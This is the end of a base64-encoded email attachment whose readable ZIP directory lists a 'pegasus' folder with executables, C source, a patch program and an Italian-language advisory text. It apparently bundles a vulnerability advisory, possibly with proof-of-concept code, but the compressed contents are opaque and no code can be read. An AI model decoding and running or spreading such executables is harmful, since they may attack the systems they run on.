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
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB--
|
|
